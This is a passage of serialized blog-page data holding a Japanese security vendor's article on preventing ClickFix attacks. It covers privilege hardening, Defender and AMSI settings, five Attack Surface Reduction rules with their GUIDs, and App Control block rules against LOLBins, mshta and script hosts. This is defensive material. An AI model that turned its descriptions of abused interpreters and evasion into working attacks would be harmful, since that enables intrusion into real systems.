コード実行の影響を限定するため、可能な限りエンドユーザーからローカル管理者権限を外す。",[835,888,889,892],{},[838,890,891],{},"Endpoint Privilege Management（EPM）:"," ユーザーを標準ユーザーとして作業させ、承認済みのアプリだけをポリシー規則で昇格させる。",[835,894,895,898],{},[838,896,897],{},"UACのハードニング:"," セキュアデスクトップの強制、管理者と標準ユーザーに対するプロンプトの挙動、インストーラー検出を確認する。",[835,900,901,904],{},[838,902,903],{},"Credential Guard:"," NTLMハッシュ、Kerberosチケットなどの資格情報を仮想化ベースのセキュリティで隔離し、攻撃者が管理者権限を得ても資格情報の窃取が困難なままになるようにする。",[526,906,907],{},"これらの統制は昇格の可能性を減らし、資格情報を保護し、最小権限を強制します。その限界は、侵害後に何が起きるかを制限するものだという点です。標準ユーザーのコンテキストにいるインフォスティーラーが、そのユーザーから読めるCookie、セッショントークン、アプリの資格情報ストアを読み出すのを止めることはできません。",[526,909,910],{},"次にMicrosoft Defenderです。Defender AVは第2段階のペイロードを検知できますが、それには正しい設定が必要です。Cloud Protectionを有効にし、保護レベルをHighまたはHigh+に設定します。AMSI、すなわちAntimalware Scan Interfaceは、メモリ上で復号または難読化解除された後、実行される前の内容を、アプリケーションがDefenderに検査のために渡せるようにするものです。PowerShellは悪意あるコードの識別にAMSIを利用し、AMSIにはリアルタイム保護と動作監視が必要です。",[526,912,913],{},"ClickFixに関係するAttack Surface Reductionのルールは少なくとも5つあります。",[597,915,917],{"style":916},"margin: 0.5rem 0 2rem; overflow-x: auto",[918,919,833,921,833,940],"table",{"style":920},"width:100%; border-collapse: collapse; font-size: 0.85rem",[922,923,924,925,833],"thead",{},"\n    ",[926,927,928,929,928,934,928,937,924],"tr",{},"\n      ",[930,931,933],"th",{"style":932},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","ルール",[930,935,936],{"style":932},"GUID",[930,938,939],{"style":932},"ClickFixとの関連",[941,942,924,943,924,959,924,974,924,987,924,1000,833],"tbody",{},[926,944,928,945,928,950,928,956,924],{},[946,947,949],"td",{"style":948},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","難読化された可能性のあるスクリプトの実行をブロックする",[946,951,953],{"style":952},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[580,954,955],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[946,957,958],{"style":948},"実行フェーズと回避フェーズでの難読化またはエンコードされたスクリプト",[926,960,928,961,928,965,928,971,924],{},[946,962,964],{"style":963},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","JavaScriptまたはVBScriptがダウンロードした実行可能コンテンツを起動するのを防ぐ",[946,966,968],{"style":967},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[580,969,970],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[946,972,973],{"style":963},"ダウンロードしたペイロードを起動するWSH、.js、.vbs",[926,975,928,976,928,979,928,984,924],{},[946,977,978],{"style":948},"実行可能ファイルを普及度、経過期間、信頼リストの基準を満たす場合にのみ許可する",[946,980,981],{"style":952},[580,982,983],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[946,985,986],{"style":948},"新しい、あるいは希少な形で書き込まれた実行ファイル",[926,988,928,989,928,992,928,997,924],{},[946,990,991],{"style":963},"メールクライアントとWebメールからの実行可能コンテンツをブロックする",[946,993,994],{"style":967},[580,995,996],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[946,998,999],{"style":963},"メールで配信されるClickFixの亜種",[926,1001,928,1002,928,1005,928,1010,924],{},[946,1003,1004],{"style":948},"すべてのOfficeアプリケーションが子プロセスを生成するのを防ぐ",[946,1006,1007],{"style":952},[580,1008,1009],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[946,1011,1012],{"style":948},"インタープリターを起動するOfficeおとりの亜種",[526,1014,1015],{},"ASRはまず監査モードで展開し、次にパイロット、それからブロックモードに進めてください。Tamper Protectionは最後の一線です。攻撃者が検知を無効化するのを防ぎます。",[526,1017,1018],{},"PowerShell自体については、レガシーなインタープリターによるリスクを減らします。新しいバージョンのロギング機能やセキュリティ機能を欠くWindows PowerShell 2.0とレガシーのVBScriptコンポーネントを、可能な範囲で特定して削除してください。次の一手はConstrained Language Mode（CLM）で、PowerShellで利用できる言語要素を制限し、スクリプトベースの手法の多くをブロックします。CLMが堅牢なセキュリティ価値を持つのは、システムのアプリケーション制御ポリシーがそれを強制する場合（App Control for Business）だけです。環境変数やAppLockerを使う方式はより弱く、回避可能です。そして多くのシステムは動作にFull Language Modeを必要とします。ソフトウェア配布のツールなどです。そのためCLMは、選ばれた環境でのみ実現可能であることが少なくありません。",[526,1020,1021],{},"ここでApp Control for Business（旧WDAC）の話になります。App Controlは、どの実行ファイル、スクリプト、ドライバーが動作してよいかについてコード整合性ポリシーを強制します。戦略的な立ち位置はデフォルト拒否に加えて、既知のLOLBinおよびバイパスのブロックリストであるMicrosoft推奨のBlock Rulesです。App ControlはPowerShellのCLMにとって正しい強制経路でもあります。Script Enforcementは、MSHTAとMSXMLのスクリプトホストをブロックし、PowerShellをCLMに押し込み、許可されていないWindows Script Hostの利用をブロックします。いくつかの挙動上の事実が重要です。",[830,1023,833,1024,833,1027,833,1030],{"style":832},[835,1025,1026],{},"Windowsを信頼するベースポリシーは、信頼されたLOLBinを自動的にブロックするわけではありません。既知のバイパスを塞ぐには、Microsoft推奨のBlock Rulesをマージする必要があります。",[835,1028,1029],{},"App Controlは署名済みのpowershell.exeやcmd.exeの起動を妨げません。制限するのはそれらが何をできるか（CLM、未署名または未許可のペイロードの排除）であり、cmd.exe、.bat、.cmdの内容までは制御しません。だからこそASRや起動のハードニングと重ねて使い、単独では使わないのです。",[835,1031,1032],{},"監査モードは中立ではありません。Script Enforcementは監査でもMSHTAとMSXMLの実行をブロックし、PowerShellのCLMの挙動を変えることがあります。そのためApp Controlは監査であっても、最初の展開からパイロットまたはリング単位に限定しなければならず、全社一斉にしてはいけません。",[526,1034,1035],{},"App Controlは、インタープリター、LOLBin、ペイロード実行のフェーズに対して単体で最も高い確度を持つ統制であり、堅牢なCLMを強制します。同時に、展開の複雑さとロールバックのリスクも最も高くなります。設定を誤れば実行がブロックされるからです。統制されたパイロットリングを通じて導入してください。",[559,1037,1038],{"id":1038},"当社の出番",[526,1040,565],{},[526,1042,1043,1044,1048],{},"ClickFixは速く、Microsoftのネイティブ検知は大半をカバーしますが、すべてではありません。CSOCをご利用のお客様に対しては、隙間が現れるところで当社がカバー範囲を継続的に広げています。Windows Terminal経由の実行、RATを用いたサポート詐欺、侵害後の振る舞いなどです。自社の環境が現在どの位置にあるかを知りたい方は、",[1045,1046,1047],"a",{"href":276},"ご連絡ください","。",[1050,1051,1052],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":530,"searchDepth":531,"depth":531,"links":1054},[1055,1056,1057,1058,1059,1060,1061,1062,1063],{"id":561,"depth":531,"text":562},{"id":643,"depth":531,"text":644},{"id":655,"depth":531,"text":655},{"id":677,"depth":531,"text":678},{"id":789,"depth":531,"text":790},{"id":819,"depth":531,"text":820},{"id":856,"depth":531,"text":857},{"id":872,"depth":531,"text":873},{"id":1038,"depth":531,"text":1038},"post",{"lang":1066,"seoTitle":1067,"titleClass":1068,"date":1069,"categories":1070,"blogtitlepic":1071,"socialimg":1072,"customExcerpt":1073,"keywords":1074,"asideNav":1075,"published":325},"ja","ClickFix攻撃を検知して防ぐ：Win+Rペーストの手口","h2-font-size","2026-09-21",[235],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFixはユーザーを自分自身への攻撃者に変えます。偽のCAPTCHA、コピー＆ペースト、そして悪意あるコードがメモリ上で走り、ディスクには何も残りません。Microsoft Defenderがこの攻撃をどう検知するのか、検知はどこで限界に達するのか、そしてRunMRUハントと4つの防御レイヤーでその隙間をどう埋めるのかを解説します。","ClickFix, ClickFix 攻撃, ClickFix 検知, ClickFix 防止, 偽CAPTCHA, Win+R 攻撃, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASRルール, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, インフォスティーラー, LOLBin, PowerShell ハードニング",{"menuItems":1076},[1077,1080,1083,1086,1089,1092,1095,1098,1101],{"href":1078,"text":1079},"#clickfixの攻撃チェーン","攻撃チェーン",{"href":1081,"text":1082},"#microsoft-defenderが検知するもの","Defenderが検知するもの",{"href":1084,"text":1085},"#ネイティブ検知が限界に達するところ","どこでつまずくか",{"href":1087,"text":1088},"#その隙間を埋めるrunmruハント","隙間を埋める",{"href":1090,"text":1091},"#防御レイヤー1配信をブロックする","レイヤー1：配信",{"href":1093,"text":1094},"#防御レイヤー2トリックをブロックする","レイヤー2：トリック",{"href":1096,"text":1097},"#防御レイヤー3操作をブロックする","レイヤー3：操作",{"href":1099,"text":1100},"#防御レイヤー4実行をブロックする","レイヤー4：実行",{"href":1102,"text":1038},"#当社の出番","/posts/2026-09-21-clickfix-prevent-detect",{"title":553,"description":530},"posts/2026-09-21-clickfix-prevent-detect",[1107,1108,1109],"Defender","SOC","Endpoint Security","QVSlYhTffeBkc3miILninyrGf79fx7pzGxgoQAZgNPo",[],{"id":1113,"extension":1114,"meta":1115,"stem":8,"__hash__":1125},"authors_data/authors.json","json",{"Fritz Zurhorst":1116,"Nadine Klein":1121},{"display_name":555,"avatar":1117,"permalink":1118,"linkedin":1119,"imageOffsetTop":1120},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":535,"avatar":1122,"permalink":1123,"twitter":1124,"linkedin":548,"imageOffsetTop":1120},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383984775]